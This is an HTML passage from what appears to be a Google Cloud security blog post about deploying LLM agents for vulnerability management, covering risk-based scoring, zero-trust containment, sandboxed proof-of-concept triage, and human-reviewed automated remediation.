&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Toxic flow analysis (TFA) and Observable Actions:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The objective of TFA is to monitor data paths at runtime, ensuring agents do not exfiltrate sensitive internal context to unvetted external endpoints. Agent actions, inputs, reasoning, and outputs must be fully observable and transparently logged. While implementing dynamic taint tracking for LLMs remains a complex architectural challenge, organizations should clearly separate this runtime observability from static supply chain controls. Integrating threat intelligence to hash and vet incoming agent tools provides a necessary baseline for verifying integrity &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;before&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; deployment. However, because static controls cannot address behavior post-deployment, mitigating data exfiltration ultimately requires active runtime monitoring and secure, centralized logging to trace and restrict the actual flow of data.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Demystifying AI image1" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image1.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 1: Visual representation of an isolated AI agent environment using SAIF mechanisms&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;By operationalizing these tools within frameworks that demand verifiable integrity and structural resilience, organizations can safely bridge the gap between AI velocity and enterprise defense.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;The need for human-led threat modeling&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While LLMs excel at identifying syntax patterns, source code itself rarely contains the full picture of unwritten business intent. Some organizations attempt to solve this by connecting LLM agents to internal wikis, design documents, and issue trackers using retrieval-augmented generation (RAG).&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While RAG gives the model access to external business context, it is not a perfect fix. Corporate documentation is frequently stale, contradictory, or incomplete. An AI agent might retrieve an outdated architecture diagram and confidently hallucinate a secure path that no longer exists in production. Because LLM agents struggle to resolve conflicting, undocumented human assumptions, human-led threat modeling remains a critical security control across both legacy applications and modern agent workflows.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Security teams should apply threat modeling during both the pre-build system design phase to establish a secure foundation, and during post-build architecture reviews. While an AI agent might successfully identify a poorly configured internal endpoint locally, a human threat modeler asks the structural question: &lt;/span&gt;&lt;span style="font-style: italic; vertical-align: baseline;"&gt;why does that microservice possess broad database read permissions in the first place?&lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Identifying architectural vulnerabilities requires reasoning about business risk, data sensitivity, and operational constraints. To structure this process, organizations can use industry frameworks like PASTA (Process for Attack Simulation and Threat Analysis) or service offerings like the &lt;/span&gt;&lt;a href="https://services.google.com/fh/files/misc/ds-threat-modeling-security-service-en.pdf" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Mandiant Threat Modeling Security Service&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to map trust boundaries, uncover structural design flaws, and prioritize compensating controls. Securing fundamental architecture through human oversight is a necessary component when relying on automated agents to find bugs in a poorly designed system.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Once these AI agents are safely sandboxed, as guided by SAIF, and the architecture is verified through threat modeling, organizations can typically apply them to two different problem spaces: Enterprise Vulnerability Management (to assist in managing the volume of known CVEs in commercial off-the-shelf (COTS) software and infrastructure) and Product Security (to identify vulnerabilities in 1st-party (1P) code).&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Track 1: Enterprise Vulnerability Management&lt;/span&gt;&lt;/h3&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Foundational security and discovery &lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While the second track of this post explores how AI agents can uncover complex zero-days in custom code, organizations should manage the scale of enterprise infrastructure in tandem with these AI deployments. Even as new AI capabilities dominate headlines, organizations should still address foundational security challenges, such as secrets sprawl, unmanaged service accounts, missing FIDO2 MFA, and legacy VPN concentrators. Although vulnerability exploitation was the primary initial infection vector in intrusions Mandiant investigated last year, threat actors consistently rely on missing foundational controls and unpatched edge devices to secure and escalate their foothold after exploiting a vulnerability.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Furthermore, AI cannot replace foundational visibility. As security teams deploy AI agents, they should simultaneously close these tactical entry points by maximizing dynamic discovery capabilities like External Attack Surface Management (EASM), Cloud Security Posture Management (CSPM), and Continuous Threat Exposure Management (CTEM). In hybrid and cloud environments, tools like &lt;/span&gt;&lt;a href="https://cloud.google.com/wiz?e=48754805"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Wiz&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; can be used to map this initial footprint.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Risk-based vulnerability management &lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Vulnerability management teams are already overwhelmed by the current volume of findings generated by traditional scanners. As organizations scale dynamic discovery tools, such as EASM, CSPM and CTEM, alongside automated AI agents, this influx of findings will compound the problem. To manage this influx, telemetry from these diverse discovery methods must first be normalized and deduplicated. This normalized data serves two purposes: it feeds directly into the risk engine, and it acts as a live overlay to correct stale records in the configuration management database (CMDB). By evaluating the deduplicated vulnerabilities alongside this newly updated asset context and frontline threat intelligence, the RBVM engine calculates a custom risk score that allows security teams to dynamically prioritize remediation.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A mature RBVM methodology calculates a customized risk score on a 0 to 100 scale using a weighted average. A sample formula for calculating this risk-based score is:&lt;/span&gt;&lt;/p&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="vertical-align: baseline;"&gt;Final Score = (W_1 * S_vuln) + (W_2 * S_asset) + (W_3 * S_threat)&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The variables and weights (W) are customized to the organization's risk appetite (for example, 0.20 for vulnerability, 0.40 for asset, and 0.40 for threat, summing to 1.0), while the underlying variables (S) are scored on a 0 to 100 scale and defined as follows:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Vulnerability severity (S_vuln): &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;The inherent technical severity of the flaw. This is calculated by taking the CVSS Base Score (which natively accounts for confidentiality, integrity, and availability impact) and multiplying it by 10.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Asset context (S_asset): &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;A combined metric of exposure and data sensitivity. Scores range from 100 for internet-facing assets holding customer data, down to 25 for internal-only assets with no sensitive data. To translate this impact into monetary terms for non-technical stakeholders, organizations can incorporate Factor Analysis of Information Risk (FAIR) principles into this metric. However, this approach requires highly accurate, continuously updated financial data that many enterprises struggle to maintain at scale.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Threat context (S_threat): &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;The real-world urgency of the vulnerability. Scores range from 100 if actively exploited by threat actors relevant to the organization's profile, 75 if a proof-of-concept exists or if it is a vulnerability class easily exploited by autonomous AI agents, down to 25 if the exploit is theoretical and highly complex. Organizations should also map the Exploit Prediction Scoring System (EPSS) probability percentage directly into this variable. This allows the threat score to automatically scale up or down as real-world exploitation telemetry shifts, aligning static vulnerability data with active threat intelligence.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;An asset's customized risk score should directly influence internal remediation service-level agreements (SLAs), unless external compliance-driven mandates, such as CISA Binding Operational Directives (BODs), or relevant equivalents, override internal prioritization. A risk-driven and threat-intelligence-driven vulnerability prioritization methodology will help organizations focus resources on managing and mitigating the most critical security vulnerabilities first. This is an area where LLMs can support the vulnerability management process, particularly by helping teams synthesize unstructured threat intelligence to surface relevant risk contexts more efficiently. Enforcing strict SLOs for patching, while requiring formal risk acceptance documentation for any patching exceptions, will help reduce the number of vulnerabilities available to threat actors and increase the visibility of outstanding risks across the organization. Furthermore, organizations should integrate RBVM data directly into their security orchestration, automation, and response (SOAR) platforms for automated alert enrichment.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--medium
      
      
        h-c-grid__col
        
        h-c-grid__col--4 h-c-grid__col--offset-4
        
      "&gt;

      
      
        
        &lt;img alt="Demystifying AI image5" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image5.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 2: Integration points of a risk-based vulnerability management (RBVM) program.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Containment and Observability&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Modern architecture blueprints must prioritize attack surface reduction under the assumption that vulnerabilities will inevitably be exploited. Moving away from traditional perimeter defenses, organizations should align with zero trust principles, ensuring that security boundaries are established around every asset, workload, and identity.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A component of this alignment is the implementation of strong authentication principles. Organizations should eliminate implicit trust by enforcing continuous, context-aware authentication and authorization. Utilizing Zero Trust Network Access (ZTNA) solutions, such as Identity-Aware Proxies (IAP), shields critical management interfaces (e.g., SSH, RDP) and internal systems from direct internet exposure, granting access only to verified identities and compliant devices.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;For public-facing applications and APIs, attack surface reduction involves deploying Layer 7 inspection at the load balancer or API gateway level. This hardening layer enforces strict schema validation, intercepting and neutralizing malformed inbound traffic and potential exploits before they can interact with internal application logic.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Securing the software supply chain is equally vital in modern blueprints, and organizations should align with frameworks like &lt;/span&gt;&lt;a href="https://slsa.dev/spec/v0.1/levels" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Supply-chain Levels for Software Artifacts (SLSA)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; across both dependency and build tracks. Security policies should mandate that third-party dependencies are routed through a centralized artifact repository equipped with automated curation services, such as &lt;/span&gt;&lt;a href="https://cloud.google.com/security/products/assured-open-source-software"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Google Assured Open Source Software (OSS)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; or an equivalent solution, preventing untrusted code from entering the development lifecycle. Furthermore, maturing toward advanced SLSA build levels (e.g., SLSA level 3) through the implementation of isolation, ephemerality and reproducibility requirements via  ephemeral compute infrastructure for CI/CD runners reduces the likelihood of attacker persistence by ensuring environments are short-lived and automatically cycled.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To complement these pre-build controls, runtime observability should be established across all production workloads. This requires monitoring both infrastructure-level behavior and the specific runtime libraries actively executing in production, which surfaces true exploitable risk far beyond a static Software Bill of Materials. In tandem with monitoring workloads, organizations should secure how they authenticate by implementing workload identity federation. By removing static credentials and instead using short-lived tokens backed by strong cryptographic identity verification, organizations can reduce the risk of credential theft and unauthorized lateral movement.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Within the internal environment, microsegmentation should be enforced to break down flat networks into granular security zones. Routing application traffic through a Secure Access Service Edge (SASE) architecture integrates network routing directly with robust identity controls, rendering internal services completely invisible to unauthenticated users and containing threats to their initial point of entry.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Finally, automated containment and incident response within a zero trust framework must rely on deterministic, auditable tooling. Endpoint detection and response (EDR) platforms and SOAR playbooks should handle high-fidelity containment tasks through hardcoded execution logic. While AI tools accelerate triage and policy recommendation, actual execution capabilities must remain restricted to well-defined, pre-tested workflows to maintain total architectural predictability.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Demystifying AI image8" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image8.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 3: Structural containment and observability architecture&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Track 2: Product Security &amp;amp; Development (1P Code)&lt;/span&gt;&lt;/h3&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Deterministic and probabilistic tooling&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Integrating LLM agents into vulnerability management and security workflows requires recognizing the differences between deterministic and probabilistic tooling. Traditional SAST and DAST tools utilize fixed methodologies to evaluate vulnerabilities through structural code parsing or definitive runtime observations. LLMs, however, evaluate source code by processing tokens simultaneously to calculate statistical and semantic relationships, rather than tracing deterministic execution tracks.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;While techniques like Chain of Thought (CoT) prompting allow models to bridge this gap by decomposing complex code paths into intermediate reasoning steps, this process remains bounded by architectural limitations. Even when a model possesses a context window large enough to ingest entire repositories, it may experience attention degradation across long inputs, often failing to correctly weight intervening validation or sanitization logic within the prompt. For example, if a variable is tainted on line 10 but sanitized on line 500, attention degradation can cause the model to lose track of the sanitization logic. Furthermore, when enterprise codebases require chunking to fit within context limits, the resulting fragmentation may cause the model to lose track of end-to-end data flows.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Consequently, probabilistic engines are effective at uncovering localized, static anomalies, such as hardcoded credentials or outdated dependencies, but frequently misjudge complex vulnerabilities split across fragmented chunks or extended context windows. Notable exceptions occur when these probabilistic models are coupled with deterministic feedback loops. For instance, when analyzing C++ memory corruption, an LLM can be equipped with a test harness to iteratively execute code and definitively prove a crash. While these dynamic validation applications are detailed in subsequent sections, the baseline limitation for static analysis across standard enterprise codebases remains: models struggle to consistently evaluate dispersed logic.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Demystifying AI image4" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image4.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 4: Deterministic SAST scanners vs. probabilistic LLMs&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Binary and architectural oracles&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Many security programs are moving toward agent workflows where an agent autonomously spins up a test environment and uses tools to execute payloads and verify its findings. This is a promising approach, but it is important to understand where it is most effective.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Agent workflows perform well against bug classes with binary and observable oracles, meaning the system provides an objective, 'crash or no crash' feedback loop. For example, if a model is hunting for memory corruption in a C++ kernel, a successful exploit is undeniable: the payload executes, and a resulting crash definitively proves the vulnerability. This explains why the industry is currently seeing a surge in AI-discovered vulnerabilities across memory-unsafe targets like web browsers and operating systems.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;However, enterprise software is heavily dominated by vulnerabilities that require architectural oracles for validation. Vulnerabilities like authorization bypasses, complex business logic flaws, and indirect server-side request forgeries require an understanding of business context and cross-service trust boundaries. If an agent's payload fails to produce a clear outcome, it can't reliably distinguish whether the vulnerability is a hallucination or if it simply constructed the payload incorrectly. An agent's malformed payload might even crash an unrelated background process and cause the model to hallucinate a success and report a false confirmation. Complex enterprise architecture contains unwritten business intent that a probabilistic engine can't inherently know.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Demystifying AI image3" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Demystifying_AI_image3.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 5: Evaluating vulnerabilities against binary vs. architectural oracles&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Targeted deployment and human impact&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Organizations adopting LLMs for vulnerability discovery face a massive staffing challenge. LLMs can generate findings significantly faster than human engineers can triage them. If every LLM-generated alert requires manual review, security teams will quickly face burnout and/or suffer alarm fatigue.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Rather than indiscriminately pointing agents at all available codebases and risking an influx of unverified output, security teams need a selective deployment strategy. Mature programs should maintain SAST and DAST for baseline hygiene and deterministic rule enforcement, and reserve intensive agent audits for high-impact components with clear binary oracles.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Organizations can prioritize agent audits on systems where the technology's strengths align with the broader risk profile:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Memory-unsafe codebases:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Legacy or high-performance components written in memory-unsafe languages such as C, C++, or Assembly are strong candidates for LLM audits. These languages are susceptible to memory corruption flaws, such as buffer overflows and use-after-free conditions. Because these vulnerabilities trigger definitive failure states like segmentation faults, they work well with automated sandboxes where agents can compile the code with memory sanitizers and write proof-of-concept inputs. This approach is also effective for auditing the native extensions where safe languages call unsafe internal libraries, such as Python C extensions or the Java Native Interface (JNI).&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Systems highly exposed to outside content:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; First-party data ingestion pipelines, custom API gateways, or proprietary edge proxies. A prerequisite here is direct access to the source code, this strategy is strictly for internally developed or fully open-source codebases where the organization can inspect the logic. Because these systems directly parse untrusted internet traffic, targeting their source code for LLM-driven audits yields the highest risk-reduction ROI.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Shared internal libraries and utilities: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Core serialization/deserialization packages, common utility functions, and custom middleware wrappers (such as internal message-queue parsers) maintained in-house. Because the enterprise owns the source code for these shared building blocks, agent tools can easily hook into them within automated test harnesses to fuzz inputs and catch low-level logic or parsing bugs with high fidelity.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Foundational security boundaries:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Internally developed centralized authentication services, custom OAuth providers, and internal credential brokers. While testing complex identity boundaries generates higher logic-based noise, having full access to the source code allows teams to pair agents with deterministic checks to safely triage findings, given that the blast radius of an authentication failure justifies the human effort.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To filter the noise generated by LLMs, organizations should establish routing rules. Require the agent to generate a fully reproducible, deterministic test harness (such as a compiled binary or a Python test script) that attempts to prove the exploit. This harness must execute automatically in an isolated, monitored sandbox. If the sandbox execution fails (due to a syntax error or a failed exploit), the ticket is discarded, sparing human resources. However, organizations should enforce execution timeouts and iteration limits on these test harnesses. Without hard limits, an autonomous agent attempting to prove a vulnerability can fall into an infinite loop: writing a script, failing, rewriting, and failing again, exhausting API token budgets and compute resources against a single dead-end vulnerability, creating significant cost overruns without advancing the security review. To manage these expenses, organizations should incorporate FinOps principles to balance the compute and API costs of LLM audits against the traditional expenses of manual triage.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;However, a successful execution in the sandbox does not guarantee an actionable, high-priority risk. In practice, autonomous agents frequently produce working PoCs for genuine technical flaws that are ultimately irrelevant; or warrant a lower remediation priority within the context of the system's threat model. For example, the agent might successfully exploit an unreachable dead-code path, or trigger a bug that requires administrative access to execute and yields no further escalation of privilege. Therefore, a human engineer should be assigned to review and prioritize the ticket only if the sandbox registers a successful execution, validating environmental context, reachability, and true business impact as part of the review.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This workflow reduces the volume of alerts, but it is important to understand that the security team's workload does not disappear. The engineer's primary job shifts from manually hunting for the initial vulnerability to auditing the LLM-generated proof to ensure it represents a meaningful risk rather than an unexploitable or contextually irrelevant finding. Leadership should properly staff and train teams for this new reality. Deploying LLM agents does not remove the need for skilled practitioners; it redirects their workload toward complex validation. Equally important is training teams to recognize the risk of false negatives. A hyper-focus on filtering AI-generated noise can create a false sense of security. If an exploit relies on a novel technique or a zero-day vulnerability that was not heavily weighted in the model's training data, the agent will likely scan right past it in silence. LLMs augment discovery, but they do not guarantee exhaustive coverage.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;When integrating LLMs into SAST triage pipelines, human engineers should also verify the broader architectural integrity. Prompting an LLM with specific SAST warnings can induce contextual narrowing, where the agent becomes hyper-fixated on resolving a localized syntax error and misses broader architectural flaws existing in the same file. Furthermore, if the agent's mandate extends beyond discovery to automated remediation (such as writing and proposing code fixes), this human-in-the-loop validation becomes critical to ensure the LLM does not inadvertently introduce new regressions or bypass intended business logic.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Demistiying Image 6 New" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/image_20.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 6: Flowchart outlining the targeted LLM deployment and triage workflow.&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Remediation and hardening&lt;/span&gt;&lt;/h3&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;LLM-assisted code remediation&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;A primary goal of integrating large language models (LLMs) into the software development lifecycle is automated remediation. To achieve this, organizations are deploying these capabilities through two primary execution methods: directly within the integrated development environment (IDE) or as a centralized pipeline runner. Examples include &lt;/span&gt;&lt;a href="https://deepmind.google/blog/introducing-codemender-an-ai-agent-for-code-security/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CodeMender&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;, although as of time of writing, it is not publicly available.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;strong style="vertical-align: baseline;"&gt;IDE-integrated method&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This method shifts remediation as far left as possible by operating as an active pair-programmer. Tools running continuous static analysis in the background of the IDE surface vulnerabilities directly to the developer via editor diagnostics like inline indicators or hover tooltips.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Localized scope:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The developer can trigger the LLM agent to analyze the localized data flow and generate a targeted patch (such as implementing parameterized SQL queries). By constraining the LLM to localized, syntax-level fixes, the scope of the change remains contained. This prevents the agent from attempting sprawling, multi-file refactors that frequently break complex architectural logic.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Human-in-the-loop:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; The developer reviews the AI-generated patch before the code is committed.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Managing false positives:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Local IDE agents allow developers to manage false positives dynamically. Suppressing alerts anchored to specific line text reduces alert fatigue and preserves developer trust.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong style="vertical-align: baseline;"&gt;CI/CD runner method&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The runner method executes asynchronously within the CI/CD pipeline to use an LLM to review committed code and automatically propose remediation.&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Restricted execution and deterministic validation: &lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;Asking a centralized runner to automatically rewrite a complex, multi-file authorization flaw directly in the main branch introduces a high risk of breaking logic errors. To mitigate this, agents must be restricted to generating pull requests (PRs). Once a PR is generated, it must automatically execute standard regression suites alongside the deterministic test harness. By rerunning the initial PoC against the patched code, the workflow repurposes the exploit script as a validation oracle to prove the vulnerability has been remediated. A human engineer then reviews the PR to validate the architectural logic before merging.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In all cases security teams should define a clear boundary between the two methods rather than rely on a single approach. IDE agents provide immediate, syntax-level support. They catch and resolve low-complexity errors locally before developers commit code. Centralized CI/CD runners handle broader organizational baselines. They propose complex, repository-wide fixes for vulnerabilities that bypass local environments.&lt;/span&gt;&lt;/p&gt;
